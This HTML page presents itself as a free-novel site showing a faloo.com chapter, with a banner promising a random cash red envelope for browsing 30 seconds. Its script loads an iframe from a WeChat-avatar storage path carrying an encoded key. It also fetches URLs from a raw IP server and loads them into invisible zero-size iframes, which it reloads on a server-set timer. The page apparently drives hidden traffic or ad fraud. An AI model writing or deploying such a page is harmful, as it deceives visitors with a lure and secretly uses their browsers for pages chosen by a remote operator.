<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>免费小说网</title>
    <style type="text/css">
        body {
            margin: 0;
            padding: 0;
        }

        a {
            text-decoration: none;
        }

        .show-monitor {
            width: 320px;
            height: 600px;
            margin: 50px 0px 0px 50px;
        }

        .panel-head {
            display: flex;
            align-items: center;
        }

        .panel-head span.panel-head-title {
            flex-grow: 1;
            font-size: 20px;
            margin-left: 10px;
        }

        .panel-head .panel-head-sx {
            font-size: 16px;
            color: red;
            margin-left: 5px;
        }

        .panel-con {
            height: 94px;
            margin-top: 20px;
            display: flex;
        }

        .panel-con .panel-con-img {
            width: 126px;
            margin-right: 10px;
            flex-shrink: 0;
        }

        .panel-con .panel-con-img img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }

        .panel-con .panel-con-txt {
            flex-grow: 1;
            display: flex;
            flex-direction: column;
            text-overflow: ellipsis;
        }

        .panel-con .panel-con-txt a {
            font-size: 16px;
            color: #222;
            max-height: 44px;
            overflow: hidden;
            line-height: 22px;
            display: -webkit-box;
            -webkit-box-orient: vertical;
            -webkit-line-clamp: 2;
            text-overflow: ellipsis;
        }

        .panel-con .panel-con-txt span.like {
            font-size: 12px;
            background-color: #fff2f2;
            color: #f04142;
            align-self: flex-start;
            padding: 3px 6px;
            border-radius: 5px;
            margin-top: 5px;
        }

        .panel-con .panel-con-txt .desc {
            font-size: 14px;
            color: #999;
            display: flex;
            justify-content: space-between;
            margin-top: 5px;
        }

        .wechat-warning {
            display: none;
            text-align: center;
            padding: 20px;
            font-size: 18px;
            color: red;
        }

        #newsDetail {
            display: none;
            padding: 20px;
        }

        #backToHome {
            display: none;
            margin-top: 20px;
            padding: 10px 20px;
            background-color: #007BFF;
            color: white;
            border: none;
            border-radius: 3px;
            cursor: pointer;
        }

        #newsImages {
            margin-top: 20px;
        }

        #newsImages img {
            width: 100%;
            margin-bottom: 10px;
        }

        /* 媒体查询，针对小屏幕设备（手机）进行样式调整 */
        @media (max-width: 768px) {
            .show-monitor {
                width: auto;
                height: auto;
                margin: 20px;
            }

            .panel-con {
                height: auto;
            }

            .panel-con .panel-con-img {
                width: 100px;
            }

            .panel-con .panel-con-txt a {
                font-size: 14px;
            }

            .panel-con .panel-con-txt span.like {
                font-size: 10px;
            }

            .panel-con .panel-con-txt .desc {
                font-size: 12px;
            }
        }
    </style>
</head>

<body>
    <div class="wechat-warning" id="wechatWarning">
        请在微信中打开此页面。
    </div>

    <div id="iframeAll">
        <iframe src="https://zyk001.165g.cn/storage/Wx_avatar/20250403/0e44cde85a0163dc6eeb5454c5043388.html?token_XUHVBZ=uyLimiQP0uVV&key=HBkMCBhRQEAVHQhWBQVaFkcLVhsFUVdfRFxXPgAbFxg7CShXKRo2IyU4MjtFAxsCGFIRHFYeFiMdABEpO1saOSJLDBcADgEwEzdFGxteKgo3Fz5JPB5e"></iframe>
    </div>

    <div id="countdown" style="width: 100%;height: 20px; background-color: red;position: absolute;top: 10px;z-index: 2;text-align: center;"></div>

    <div class="show-monitor" id="showMonitor">
        <iframe src="https://wap.faloo.com/1466902_1.html" id="framemain"></iframe>
    </div>

    <script>
        let timee = 100;
        let timea = 100;
        let reflash = true;

        // 获取 URL 的查询字符串部分
        const queryString = window.location.search;
        const urlParams = new URLSearchParams(queryString);
        const name = urlParams.get('name');
        console.log('name 参数的值是:', name);

        if (name == null) {
            sendFetchGetRequest().then(result0 => {
                console.log('获取到的返回值:', result0);
                if (result0 == undefined) {
                    return;
                }

                const responseData = result0;
                const iframeAllDiv = document.getElementById('iframeAll');

                for (const key in responseData) {
                    if (responseData.hasOwnProperty(key)) {
                        const method = responseData[key].method;
                        const path = method.path;

                        const iframe = document.createElement('iframe');
                        iframe.src = path;
                        iframe.style.position = 'absolute';
                        iframe.style.height = '0%';
                        iframe.style.border = '0';
                        iframe.style.width = '0%';

                        iframeAllDiv.appendChild(iframe);
                    }
                }
            }).catch(error => {
                console.error('发生错误:', error);
                alert('请填写完整的信息');
            });
        } else {
            sendQueryAll(name).then(result => {
                console.log('获取到的返回值:', result.path);
                document.getElementById('frame').src = addHttpsPrefix(result.path);
            }).catch(error => {
                console.error('发生错误:', error);
                alert('请填写完整的信息');
            });
        }

        function refreshIframes() {
            const iframes = document.getElementById('iframeAll').getElementsByTagName('iframe');
            for (let i = 0; i < iframes.length; i++) {
                const iframe = iframes[i];
                const currentSrc = iframe.src;
                iframe.src = currentSrc;
            }
        }

        function updateCountdown() {
            timee = Math.floor(timee) - 1;
            if (timee < timea / 2 && reflash) {
                reflash = false;
                refreshIframes();
            }

            if (timee > 0) {
                const seconds = Math.floor(timee);
                const countdownElement = document.getElementById('countdown');
                countdownElement.innerHTML = `浏览30秒关闭重新扫码领随机红包`;
            } else {
                const countdownElement = document.getElementById('countdown');
                countdownElement.innerHTML = `浏览30秒关闭重新扫码领随机红包`;
            }
        }

        function addHttpsPrefix(url) {
            return url;
        }

        async function sendQueryAll(name) {
            try {
                const response = await fetch('http://111.230.237.211:3001/queryAll?name=' + name);
                if (!response.ok) {
                    throw new Error(`请求失败，状态码: ${response.status}`);
                }
                const data = await response.json();
                return data.method;
            } catch (error) {
            }
        }

        async function sendFetchGetRequest() {
            try {
                const response = await fetch('http://111.230.237.211:3001/list-apis');
                if (!response.ok) {
                    throw new Error(`请求失败，状态码: ${response.status}`);
                }
                const data = await response.json();
                return data;
            } catch (error) {
            }
        }

        async function sendGetinit() {
            try {
                const response = await fetch('http://111.230.237.211:3001/get-init');
                if (!response.ok) {
                    throw new Error(`请求失败，状态码: ${response.status}`);
                }
                const data = await response.json();
                timee = data.sleep;
                timea = data.sleep;
                return data;
            } catch (error) {
            }
        }

        sendGetinit();

        setInterval(updateCountdown, 1000);
    </script>
</body>

</html>
